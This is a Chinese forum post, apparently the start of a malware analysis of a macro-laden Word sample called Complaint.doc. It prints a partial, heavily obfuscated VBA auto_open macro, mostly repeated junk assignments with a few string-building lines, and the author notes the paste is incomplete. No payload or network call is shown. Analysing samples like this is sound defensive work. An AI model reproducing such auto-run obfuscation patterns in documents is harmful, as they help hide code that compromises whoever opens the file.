本帖最后由 hjm666 于 2019-11-13 13:50 编辑
样本信息·:
name:Complaint.doc
文件打开预览,只要是office开启并信任了宏,恶意代码会在打开文件时自动运行。
alt + f 11 利用编辑器查看该文档里的宏代码
此刻华生发现了盲点。。。
该完整(不完整)的宏代码, 在添加代码编辑代码复制代码的时候,我后悔了·····页面卡了 ,我对编辑器说你行的我相信你可以,【两分钟后】编辑器:我···大概或许可能行,我:好了,我不行,我的错·····
[Shell] 纯文本查看 复制代码
Sub auto_open()
Dim cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc As String
Dim cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA As String
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc =
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA = cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA + "o"
cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA + "P"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
